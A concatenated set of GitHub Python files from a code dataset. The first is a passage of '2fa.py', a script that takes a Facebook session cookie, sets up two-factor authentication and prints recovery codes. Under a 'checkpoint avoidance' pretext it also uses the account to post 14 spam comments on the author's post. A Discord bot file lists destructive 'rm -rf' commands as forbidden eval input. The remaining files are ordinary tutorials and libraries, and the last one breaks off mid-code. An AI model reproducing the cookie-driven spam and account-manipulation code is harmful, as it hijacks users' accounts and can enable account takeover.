lst:\r\n\t\t\t\t\t\tmemek.update(\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tx.get(\r\n\t\t\t\t\t\t\t\t\t\"name\"\r\n\t\t\t\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\t\t\t\"value\"\r\n\t\t\t\t\t\t\t\t)\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t)\r\n\t\t\t\tmemek.update(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\"pass\":sandi\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\t\tresponse = ses.post(\r\n\t\t\t\t\tlanjut.get(\r\n\t\t\t\t\t\t\"action\"\r\n\t\t\t\t\t),cookies=self.coki,data=memek\r\n\t\t\t\t).text\r\n\t\t\t\tif \"The password you entered is not correct.\" in response:\r\n\t\t\t\t\texit(\" ! The password you entered is not correct.\")\r\n\t\t\t\telse:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tkode = self.get_kode(response)\r\n\t\t\t\t\texcept IndexError:\r\n\t\t\t\t\t\texit(\" × Facebook Caught checkpoint\")\r\n\t\t\t\tprint(\"\\n * Key authen:\",kode,\"\\n * Enter the authentic key in the authentic app 2 factor!\\n\")\r\n\t\t\telse:\r\n\t\t\t\texit(\" × Facebook Caught checkpoint\")\r\n\t\tself.masuk(co)\r\n\t\r\n\tdef spam(self,cokii):\r\n\t\tprint(\" ! To avoid the checkpoint tools will delete comments on the author's post as much as 14 spam.\\n * The process is running please wait...\\n\")\r\n\t\tsp.Main(\r\n\t\t\tcokii\r\n\t\t).gasken(\r\n\t\t\t14,\"Ravi Handsom:v\"\r\n\t\t)\r\n\r\nclass Pasang(Main):\r\n\t\r\n\tdef pasang(self,link,data_code):\r\n\t\treturn ses.post(\r\n\t\t\t\"https://mbasic.facebook.com\"+str(\r\n\t\t\t\tlink\r\n\t\t\t),data=data_code,cookies=self.coki\r\n\t\t).text\r\n\tdef get_kode(self,res):\r\n\t\tkode = re.findall(\r\n\t\t\t'\\
Or enter this code into your authentication app<\\/div\\>\\
(.*?)<\\/div\\>\\<\\/div\\>',str(\r\n\t\t\t\tres\r\n\t\t\t)\r\n\t\t)[0]\r\n\t\treturn kode\r\n\tdef kode_pemulihan(self,kontol):\r\n\t\tnum = 0\r\n\t\tfor x in kontol.find_all('span'):\r\n\t\t\tif(\r\n\t\t\t\tre.findall(\r\n\t\t\t\t\t'\\d+\\s\\d+',str(\r\n\t\t\t\t\t\tx\r\n\t\t\t\t\t)\r\n\t\t\t\t)\r\n\t\t\t):\r\n\t\t\t\tnum+=1\r\n\t\t\t\tif(num==1):\r\n\t\t\t\t\tprint(f\" \\_> {x.text}\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(f\" |_> {x.text}\")\r\n\tdef get_kode_pemulihan(self):\r\n\t\twaifu_wangy = {\r\n\t\t\t\"Host\":\"mbasic.facebook.com\",\r\n\t\t\t\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n\t\t\t\"accept-language\":\"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n\t\t\t\"content-type\":\"application/x-www-form-urlencoded\",\r\n\t\t\t\"origin\":\"https://www.facebook.com\",\r\n\t\t\t\"referer\":\"https://www.facebook.com\",\r\n\t\t\t\"upgrade-insecure-requests\":\"2\",\r\n\t\t\t\"user-agent\":\"Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5\"\r\n\t\t}\r\n\t\tses.headers.update(waifu_wangy)\r\n\t\t__res = ses.get(\"https://mbasic.facebook.com/security/2fac/factors/recovery-code/\",cookies=self.coki).text\r\n\t\tkontol = par(__res, 'html.parser')\r\n\t\tif \"Use the recovery code to log in if you lose your phone or can't receive the verification code via text message or authentication app.\" in __res:\r\n\t\t\tdata = {}\r\n\t\t\tlst = [\"fb_dtsg\",\"jazoest\",\"reset\"]\r\n\t\t\tfor x in kontol.find(\r\n\t\t\t\t'form',{\r\n\t\t\t\t\t'method':'post'\r\n\t\t\t\t}\r\n\t\t\t):\r\n\t\t\t\tif x.get('name') in lst:\r\n\t\t\t\t\tdata.update(\r\n\t\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t\t'name'\r\n\t\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\t'value'\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\tdata.update(\r\n\t\t\t\t{\r\n\t\t\t\t\t\"\":\"Get Code\"\r\n\t\t\t\t}\r\n\t\t\t)\r\n\t\t\tkontol = par(\r\n\t\t\t\tses.post(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/factors/recovery-code/\",cookies=self.coki,data=data\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\t\tself.kode_pemulihan(kontol)\r\n\t\telse:\r\n\t\t\tself.kode_pemulihan(kontol)\r\n\tdef masuk(self,co):\r\n\t\tdata = {}\r\n\t\tmasuk = input(\" + input code authen: \")\r\n\t\tlst = [\"fb_dtsg\",\"jazoest\",\"code_handler_type\",\"confirmButton\"]\r\n\t\tlanjut = co.find(\r\n\t\t\t'form',{\r\n\t\t\t\t'method':'post'\r\n\t\t\t}\r\n\t\t)\r\n\t\tfor x in lanjut:\r\n\t\t\tif x.get('name') in lst:\r\n\t\t\t\tdata.update(\r\n\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t'name'\r\n\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t'value'\r\n\t\t\t\t\t)\r\n\t\t\t\t}\r\n\t\t\t)\t\r\n\t\tdata.update(\r\n\t\t\t{\r\n\t\t\t\t'confirmButton':'Lanjutkan'\r\n\t\t\t}\r\n\t\t)\r\n\t\tres = par(\r\n\t\t\tses.post(\r\n\t\t\t\t'https://mbasic.facebook.com'+str(\r\n\t\t\t\t\tlanjut.get(\r\n\t\t\t\t\t\t\"action\"\r\n\t\t\t\t\t)\r\n\t\t\t\t),cookies=self.coki,data=data\r\n\t\t\t).text, 'html.parser'\r\n\t\t)\r\n\t\tdata.clear()\r\n\t\tlanjut = res.find(\r\n\t\t\t\"form\",{\r\n\t\t\t\t\"id\":\"input_form\"\r\n\t\t\t}\r\n\t\t)\r\n\t\tlst = [\"fb_dtsg\",\"jazoest\"]\r\n\t\tfor x in lanjut:\r\n\t\t\tif x.get(\"name\") in lst:\r\n\t\t\t\tdata.update(\r\n\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t\"name\"\r\n\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\"value\"\r\n\t\t\t\t\t)\r\n\t\t\t\t}\r\n\t\t\t)\r\n\t\tdata.update({\r\n\t\t\t\"code\":masuk,\r\n\t\t\t\"submit_code_button\":\"Lanjutkan\"\r\n\t\t})\r\n\t\tresponse = 
self.pasang(\r\n\t\t\tlanjut.get(\r\n\t\t\t\t\"action\"\r\n\t\t\t),data\r\n\t\t)\r\n\t\tif \"checkpoint\" in response:\r\n\t\t\texit(\" × Account ops exposed checkpoint\")\r\n\t\telif \"Active Two-Factor Authentication \" in response:\r\n\t\t\tprint(\" √ a2f Installed successfully ^^\")\r\n\t\t\tprint(\" * Recovery code: \")\r\n\t\t\tself.get_Recovery_code()\r\n\t\telse:\r\n\t\t\tprint(\" ! Text:\",response)\r\n\t\t\texit(\" × Something went wrong in the script, try reporting it to the developer. Copy text on! Send to wa 03425081910. \")\r\n\r\n__import__('os').system('clear')\r\n\r\nif __name__==\"__main__\":\r\n\tprint(\r\n\t\tPasang(\r\n\t\t\t\"\"\r\n\t\t).logo(\r\n\t\t)\r\n\t)\r\n\tcokii = input(\" + Get cookie: \")\r\n\tresss = req.get(\r\n\t\t\"https://mbasic.facebook.com/profile.php\",cookies={\r\n\t\t\t\"cookie\":cokii\r\n\t\t}\r\n\t).text\r\n\tif \"mbasic_logout_button\" in resss:\r\n\t\tnama = re.findall(\r\n\t\t\t'\\
(.*?)<\\/title\\>',str(\r\n\t\t\t\tresss\r\n\t\t\t)\r\n\t\t)[0]\r\n\t\tprint(f' √ Cookies accept\\n ^ Welcome {nama}\\n')\r\n\t\tmenuju = Pasang(cokii)\r\n\t\tmenuju.spam(cokii)\r\n\t\tmenuju.cek()\r\n\telse:\r\n\t\texit(\" × Cookies invalid\")\r\n","repo_name":"shadow-hackr/2fa","sub_path":"2fa.py","file_name":"2fa.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8232482906","text":"import sys\nimport ctypes as ct\n\nimport ebcdic\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\n# The IBM-1047 EBCDIC codeset is used for this example but the code\n# would be similar for other non-ASCII codesets.\n#\n# Three callback functions are created below:\n# my_conv_from_ascii_to_ebcdic,\n# my_conv_from_ebcdic_to_ascii, and\n# my_conv_from_utf8_to_ebcdic\n#\n# The \"platform_xxx\" calls represent platform-specific conversion routines.\n\n\ndef ascii_to_ebcdic(source: bytes) -> bytes:\n return source.decode(\"ascii\").encode(\"cp1148\")\n\n\ndef ebcdic_to_ascii(source: bytes) -> bytes:\n return source.decode(\"cp1148\").encode(\"ascii\")\n\n\ndef utf8_to_ebcdic(source: bytes) -> bytes:\n return source.decode(\"utf-8\").encode(\"cp1148\")\n\n\n@lcurl.conv_callback\ndef my_conv_from_ascii_to_ebcdic(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = ascii_to_ebcdic(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\n@lcurl.conv_callback\ndef my_conv_from_ebcdic_to_ascii(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = ebcdic_to_ascii(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\n@lcurl.conv_callback\ndef my_conv_from_utf8_to_ebcdic(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = utf8_to_ebcdic(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"https://example.com\"\n\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(False, curl):\n if not curl: return 1\n\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n if defined(\"SKIP_PEER_VERIFICATION\"):\n lcurl.easy_setopt(curl, lcurl.CURLOPT_SSL_VERIFYPEER, 0)\n # use platform-specific functions for codeset conversions\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_FROM_NETWORK_FUNCTION,\n my_conv_from_ascii_to_ebcdic)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_TO_NETWORK_FUNCTION,\n my_conv_from_ebcdic_to_ascii)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_FROM_UTF8_FUNCTION,\n my_conv_from_utf8_to_ebcdic)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 1)\n\n # Perform the custom request\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/sampleconv.py","file_name":"sampleconv.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"41333629745","text":"# coding=utf-8\n\"\"\"Text encoding UTF-8\"\"\"\n\n# python built-in modules\nimport importlib\nimport logging\nimport sys\n\n# other modules\nimport asyncio\nimport discord\n\n# sophia modules\nimport commands\nimport bot_system\nimport room\nimport chat_tunnel\n\nlogging.basicConfig(level=logging.INFO)\nSystem = bot_system.SystemVariables(\n prefix_qualifier='>',\n prefix='>>',\n test_mode=False,\n allowed_testing=['154488551596228610', '164476517101993984'],\n atsui=('153789058059993088', '207711558866960394'),\n trigger_exclude=['110373943822540800'],\n previous_playing_message=None,\n forbidden_eval=('rm -rf /home/*',\n 'require(\"child_process\").exec(\"rm -rf /home/*\")',\n 'rm -rf / --nopreserveroot'),\n token_status=False,\n custom_filename_status=False,\n custom_filename_path='',\n eval_error_message=('ya dun goofed', 'AAAAAAAAAAAAAaaaaaaaaaaa', 'GRAND DAD', 'b-baka!!!',\n 'i-its not like I want to help you or anything!', 'git gud', 'did you re-read the code before entering it?',\n 'too much php for today?', 'maybe you need some rest?', 'maybe this might help you?',\n 'some snek told me this', 'still better than recursive infinite loop', 'you\\'ve messed up again?',\n 'try not to rely on eval too much', 'don\\'t worry, at least you\\'re improving',\n 'maybe you need to understand the code first before evaling?', 'zzz', ':eyes:', 'wew',\n '418 I\\'m a teapot', 'are you bored at the moment?', 'you\\'ve tried™', 'sdjkfhakjlhfskajhfkjlhf',\n 'what are you doing?', 'I am an error message fairy', 'are you having fun?', 'wew lad',\n 'how many times are you going to do this?', 'p-please be gentle', 'you have found a rare item!',\n 'I\\'ll slap you for this', 'no cookies for you today!', 'I\\'ll revoke your programming certificate',\n 'again?'))\nRoomInfo = room.RoomInformations([], [['Blackjack'], [6]],\n ('Waiting', 'In Progress', 'Deleted'),\n [['Testing room', 'Blackjack', 'Testing', '0']])\nTunnelInfo = chat_tunnel.TunnelInformations([], [], [], [], [], [[[True, False, 'Global Chat', '']]])\nsophia = discord.Client()\n\n@sophia.event\nasync def on_ready():\n \"\"\"Triggers when the bot is starting up.\"\"\"\n print(' [][][]')\n print(' [][] [][]')\n print(' [][] [][]')\n print(' [][] [][]')\n print('[][] [][]')\n print('[] [][] [][] []')\n print('[] [][] [][] []')\n print('[] [][] [][] []')\n print('[] [][] [] [][] []')\n print('[] [][] [] [][] []')\n print('[][] [] [][]')\n print(' [][] [] [][]')\n print(' [][] [] [][]')\n print(' [][] [] [][]')\n print(' [][][]')\n print('Logged in as ' + sophia.user.name + ', Discord ID ' + sophia.user.id + '.')\n print('Program created by SamuiNe ')\n System.previous_playing_message = System.prefix + 'help for help'\n if System.test_mode:\n await sophia.change_presence(game=discord.Game(name='\\u26A0 TEST MODE \\u26A0'))\n else:\n await sophia.change_presence(game=discord.Game(name=System.previous_playing_message))\n\n token.close()\n print('Sophia Version ' + commands.__version__ + ', Ready.')\n\n\n@sophia.event\nasync def on_message(message):\n \"\"\"Triggers when the bot receives a message.\"\"\"\n print(message)\n message_low = message.content.lower()\n\n is_allowed = True\n is_person = True\n\n if message.author.bot:\n is_person = False\n\n if System.test_mode:\n if message.server.id not in System.allowed_testing:\n is_allowed = False\n\n if is_person and is_allowed:\n if message.content.startswith(System.prefix_qualifier):\n\n if message.content.startswith(System.prefix):\n await 
commands.command_process(asyncio, discord, bot_system, chat_tunnel, System, sophia, message,\n message_low, TunnelInfo)\n\n elif message.author.id in System.ATSUI:\n if message.content is '<>modulereload' or '>_<\\n\\n\\n')\nwhile True:\n name = input('entew youw nyame pwease. >_<\\n')\n bid = int(input('\\n\\nentew youw bid pwease. XD\\n'))\n\n auction[name] = bid\n\n if input('\\n\\n\\nawe thewe any othew biddews?\\nyes o-ow nyo\\n') == 'nyo':\n break\n\nhighest_bid = 0\nhighest_bidder = ''\nfor key in auction:\n if auction[key] > highest_bid:\n highest_bid = auction[key]\n highest_bidder = key\n\nprint(\n f'\\n\\n\\n\\nthe winnew of the secwet auction p-pwogwam is {highest_bidder} with a-a bid of {auction[highest_bidder]}')\n","repo_name":"not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022","sub_path":"Day 09 - Beginner - Dictionaries, Nesting and the Secret Auction/03_PROJECT_blind_auction/blind_auction.py","file_name":"blind_auction.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"548955207","text":"# With method object\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def myfunc(self):\n print(\"Hello my name is \"+ self.name)\n\np1 = Person(\"John\",36)\np1.myfunc()\n\n# Delete\ndel p1.age # instance variable\nprint(p1.age)\n\ndel p1\nprint(p1.name)","repo_name":"HarshDex/All-Programs","sub_path":"c++/Zcollege/python/unit5/M5_Task_03_OOPsUsingPython_Part_1.py","file_name":"M5_Task_03_OOPsUsingPython_Part_1.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23495806651","text":"\r\ndef isHappy (flipStack):\r\n\r\n happySideCount = 0\r\n for i in flipStack:\r\n if i == '+': happySideCount += 1\r\n else: break\r\n\r\n return happySideCount == len(flipStack)\r\n\r\n\r\ndef flip (flipStack, side, limitSize):\r\n \r\n for i in range(limitSize):\r\n flipStack[i] = side\r\n\r\n\r\n \r\n# main\r\ninputFile = open ('B-large.in', 'r')\r\noutputFile = open('output.txt', 'w')\r\n\r\ntestCase = int(inputFile.readline())\r\nfor i in range(testCase):\r\n\r\n flipStack = [i for i in inputFile.readline().replace('\\n', '')]\r\n answer = 0\r\n\r\n \r\n while not isHappy (flipStack):\r\n\r\n for idx, val in enumerate (flipStack):\r\n if (idx < (len(flipStack) - 1) and val != flipStack[idx + 1])\\\r\n or idx == (len(flipStack) - 1):\r\n # flip\r\n flip (flipStack, ('+' if flipStack[idx] == '-' else '-'), idx + 1)\r\n \r\n break\r\n \r\n answer += 1\r\n else: outputFile.write('Case #{0}: {1}\\n'.format(i + 1, answer))\r\n\r\n \r\ninputFile.close()\r\noutputFile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/2681.py","file_name":"2681.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9128535354","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nfrom matplotlib.colors import ListedColormap\n\n# 결정경계 확인 함수\ndef plot_decision_boundary(clf, X, y, axes=[-1.5, 2.5, -1, 1.5], alpha=0.5, contour=True):\n x1s = np.linspace(axes[0], axes[1], 100)\n x2s = np.linspace(axes[2], axes[3], 100)\n x1, x2 = np.meshgrid(x1s, x2s)\n X_new = np.c_[x1.ravel(), x2.ravel()]\n y_pred = clf.predict(X_new).reshape(x1.shape)\n custom_cmap = ListedColormap(['#fafab0', '#9898ff', '#a0faa0'])\n plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)\n if contour:\n custom_cmap2 = ListedColormap(['#7d7d58', '#4c4c7f', '#507d50'])\n plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], \"yo\", alpha=alpha)\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], \"bs\", alpha=alpha)\n plt.axis(axes)\n plt.xlabel(r\"$x_1$\", fontsize=18)\n plt.ylabel(r\"$x_2$\", fontsize=18, rotation=0)\n\n# 데이터 호출\niris = load_iris()\nprint(iris.DESCR)\nprint(iris.__dir__())\n\ndata = iris[\"data\"]\nlabel = iris[\"target\"]\n\n# 꽃잎 너비로 학습 / iris 종이 Virginica면 1, 아니면 0\nx = data[:, 3:]\ny = (label==2).astype(np.int)\n\nmodel = LogisticRegression()\nmodel.fit(x, y)\n\nx_new = np.linspace(0, 3, 1000).reshape(-1, 1)\ny_prob = model.predict_proba(x_new)\ndecision_boundary = x_new[y_prob[:, 1] >= 0.5][0]\n\nplt.figure(figsize=(8, 3))\nplt.plot(x[y==0], y[y==0], \"bs\")\nplt.plot(x[y==1], y[y==1], \"g^\")\nplt.plot([decision_boundary, decision_boundary], [-1, 2], \"k:\", linewidth=2)\nplt.plot(x_new, y_prob[:, 1], \"g-\", linewidth=2, label=\"Iris-Virginica\")\nplt.plot(x_new, y_prob[:, 0], \"b--\", linewidth=2, label=\"Not Iris-Virginica\")\nplt.text(decision_boundary+0.02, 0.15, \"Decision\\nBoundary\", fontsize=14, color=\"k\", ha=\"center\")\nplt.arrow(decision_boundary, 0.08, -0.3, 0, head_width=0.05, head_length=0.1, fc='b', ec='b')\nplt.arrow(decision_boundary, 0.92, 0.3, 0, head_width=0.05, head_length=0.1, fc='g', ec='g')\nplt.xlabel(\"Width (cm)\", fontsize=14)\nplt.ylabel(\"Prob\", fontsize=14)\nplt.legend(loc=\"center left\", fontsize=14)\nplt.axis([0, 3, -0.02, 1.02])\n# plt.save_fig(\"logistic_regression_plot\")\nplt.show()\n\npred = model.predict_prob([[1.7], [1.5]])\nprint(pred)\n\n# iris data - Logistic Regression\niris = load_iris()\n\ndata = pd.DataFrame(iris[\"data\"])\ndata.columns=['sepal_len', 'sepal_wid', 'petal_len', 'petal_wid']\ndata[\"species\"] = iris[\"target\"]\n\nx = data.iloc[:, :-1].values\ny = (data.iloc[:, -1].values==2).astype(np.int)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n\nmodel = LogisticRegression()\nmodel.fit(x_train, y_train)\n\ny_pred = model.predict(x_test)\ny_pred_prob = model.predict_proba(x_test)\n\n","repo_name":"slykid/Python3","sub_path":"Python Machine Learning Code/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7936502337","text":"a=input()\nc=0\nfor i in range(len(a),5,-1):\n b=a[i-6:i]\n if(b=='111111' or b=='000000'):\n c=1\n print(\"Sorry, sorry!\")\n break\nif c==0:\n print(\"Good luck!\")\n","repo_name":"kiransivasai/hackerearth_problems","sub_path":"little_jhool.py","file_name":"little_jhool.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36600117316","text":"import customtkinter as ctk\nfrom gui.widgets import *\n\nclass App(ctk.CTk):\n def __init__(self):\n super().__init__()\n self.title(\"Webpage Autorefresh\")\n self.screen_width = self.winfo_screenwidth()\n self.screen_height = self.winfo_screenheight()\n self.window_width = 700\n self.window_height = 600\n self.x_coordinate = int((self.screen_width/2) - (self.window_width/2))\n self.y_coordinate = int((self.screen_height/2) - (self.window_height/1.9))\n self.geometry(f\"{self.window_width}x{self.window_height}+{self.x_coordinate}+{self.y_coordinate}\")\n self.grid_columnconfigure(0, weight=1)\n\n self.header = Header(master=self, width = 550, height = 150)\n self.header.grid(pady=(10, 5))\n self.links_container = LinksContainer(self, width = 550, height = 400)\n self.links_container.grid(pady=5)\n self.get_browser()\n \n def get_browser(self):\n with open(\"browser_path.txt\", \"r\") as f:\n if not os.path.isfile(f.readline()):\n GetBrowserWindow(self)\n\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n","repo_name":"d4niel-bautista/Webpage-Autorefresh","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19805226054","text":"# ### Problem **4: Arrange string characters such that lowercase letters should come first**\n# Given string contains a combination of the lower and upper case letters. Write a program to arrange the characters of a string so that all lowercase letters should come first.\n# **Given**:\n# ```\n# str1 = PyNaTive\n# ```\n# **Expected Output**:\n# ```\n# yaivePNT\n# ```\n\nstr1 = \"PyNaTive\"\n\ns1 = \"\" \ns2 = \"\" \n\nfor char in str1:\n if char.islower():\n s1 = s1 + char\n else:\n s2 = s2 + char\n\nresult = s1 + s2 \n\nprint(result)\n","repo_name":"kuldeepkd13/LearningPython","sub_path":"set2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44490688937","text":"from collections import defaultdict\nfrom typing import Sequence, Union, Optional, Dict, Tuple\nfrom warnings import warn\n\nimport torch\nimport numpy as np\n\nfrom scipy.stats import rankdata\n\nfrom .base import MixedEffectsModule, ReSolver\nfrom .utils import chunk_grouped_data, validate_tensors, validate_group_ids\nfrom torch.distributions import MultivariateNormal\n\nfrom torch_hlm.low_rank import WoodburyMultivariateNormal\n\n\nclass GaussianReSolver(ReSolver):\n\n def __init__(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n design: dict,\n **kwargs):\n self.iterative = len(design) > 1\n super().__init__(X=X, y=y, group_ids=group_ids, weights=weights, design=design, **kwargs)\n\n def _calculate_htild_inv(self, XtX: torch.Tensor, pp: torch.Tensor) -> torch.Tensor:\n return torch.inverse(XtX + pp)\n\n @staticmethod\n def ilink(x: torch.Tensor) -> torch.Tensor:\n return x\n\n def _calculate_grad(self,\n X: torch.Tensor,\n y: torch.Tensor,\n mu: torch.Tensor) -> torch.Tensor:\n _, num_res = X.shape\n return X * (y - mu).unsqueeze(-1).expand(-1, num_res)\n\n def solve_step(self,\n X: torch.Tensor,\n y: torch.Tensor,\n offset: torch.Tensor,\n group_ids: np.ndarray,\n weights: torch.Tensor,\n prior_precision: torch.Tensor,\n Htild_inv: torch.Tensor,\n prev_res: Optional[torch.Tensor],\n iter_: int,\n converged_mask: Optional[np.ndarray] = None,\n XtX: Optional[torch.Tensor] = None,\n **kwargs\n ) -> torch.Tensor:\n if self.iterative:\n return super(GaussianReSolver, self).solve_step(\n X=X,\n y=y,\n offset=offset,\n group_ids=group_ids,\n weights=weights,\n prior_precision=prior_precision,\n Htild_inv=Htild_inv,\n prev_res=prev_res,\n converged_mask=converged_mask,\n iter_=iter_\n )\n else:\n assert converged_mask is None\n assert XtX is not None\n num_obs, num_res = X.shape\n num_groups = len(XtX)\n group_ids_seq = torch.as_tensor(rankdata(group_ids, method='dense') - 1)\n group_ids_broad = group_ids_seq.unsqueeze(-1).expand(-1, num_res)\n assert y.shape == weights.shape\n yoff = (y - offset)\n Xty_els = X * yoff.unsqueeze(1) * weights.unsqueeze(1)\n Xty = torch.zeros(num_groups, num_res).scatter_add(0, group_ids_broad, Xty_els)\n return torch.linalg.solve(XtX + prior_precision, Xty.unsqueeze(-1)).squeeze(-1)\n\n @staticmethod\n def _get_hessian(\n X: torch.Tensor,\n weights: torch.Tensor,\n mu: torch.Tensor) -> torch.Tensor:\n return weights * X.t() @ X\n\n\nclass GaussianMixedEffectsModule(MixedEffectsModule):\n solver_cls = GaussianReSolver\n\n def __init__(self,\n fixeff_features: Union[int, Sequence],\n raneff_features: Dict[str, Union[int, Sequence]],\n fixed_effects_nn: Optional[torch.nn.Module] = None,\n covariance: str = 'log_cholesky',\n re_scale_penalty: Union[float, dict] = 0.):\n super().__init__(\n fixeff_features=fixeff_features,\n raneff_features=raneff_features,\n fixed_effects_nn=fixed_effects_nn,\n covariance=covariance,\n re_scale_penalty=re_scale_penalty,\n )\n self._residual_std_dev_log = torch.nn.Parameter(.01 * torch.randn(1))\n\n def _forward_to_distribution(self, pred: torch.Tensor, **kwargs) -> torch.distributions.Distribution:\n return torch.distributions.Normal(loc=pred, scale=self.residual_var ** .5, **kwargs)\n\n @property\n def residual_var(self) -> torch.Tensor:\n std = self._residual_std_dev_log.exp()\n if torch.isclose(std, torch.zeros_like(std)):\n eps = 0.001\n warn(f\"`{type(self)}().residual_var` near-zero, adding {eps ** 2}\")\n std = std + eps\n return std ** 
2\n\n def _get_loss(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n cache: dict,\n loss_type: Optional[str] = None,\n **kwargs):\n if loss_type == 'mvnorm':\n return -self._get_mvnorm_log_prob(X=X, y=y, group_ids=group_ids, weights=weights, **kwargs)\n return super()._get_loss(\n X=X, y=y, group_ids=group_ids, cache=cache, loss_type=loss_type, weights=weights, **kwargs\n )\n\n def _get_default_loss_type(self) -> str:\n if len(self.rf_idx) == 1:\n return 'mvnorm'\n else:\n return 'iid'\n\n def _get_iid_log_probs(self,\n pred: torch.Tensor,\n actual: torch.Tensor,\n weights: torch.Tensor) -> torch.Tensor:\n dist = self._forward_to_distribution(pred, validate_args=False)\n dist.scale = dist.scale / torch.sqrt(weights)\n log_probs = dist.log_prob(actual)\n return log_probs\n\n def _get_mvnorm_log_prob(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n **kwargs) -> torch.Tensor:\n extra = set(kwargs)\n if extra:\n warn(f\"Ignoring {extra}\")\n\n X, y = validate_tensors(X, y)\n group_ids = validate_group_ids(group_ids, num_grouping_factors=len(self.grouping_factors))\n if weights is None:\n weights = torch.ones_like(y)\n assert weights.shape == y.shape\n\n if len(self.grouping_factors) > 1:\n raise NotImplementedError\n # mercifully, if there is one grouping-factor, overall prob is just product of individual probs:\n gf = self.grouping_factors[0]\n\n # model-mat for raneffects:\n Z = torch.cat([torch.ones((len(X), 1)), X[:, self.rf_idx[gf]]], 1)\n\n Xs_by_r = defaultdict(list)\n ys_by_r = defaultdict(list)\n Zs_by_r = defaultdict(list)\n ws_by_r = defaultdict(list)\n for Z_g, X_g, y_g, 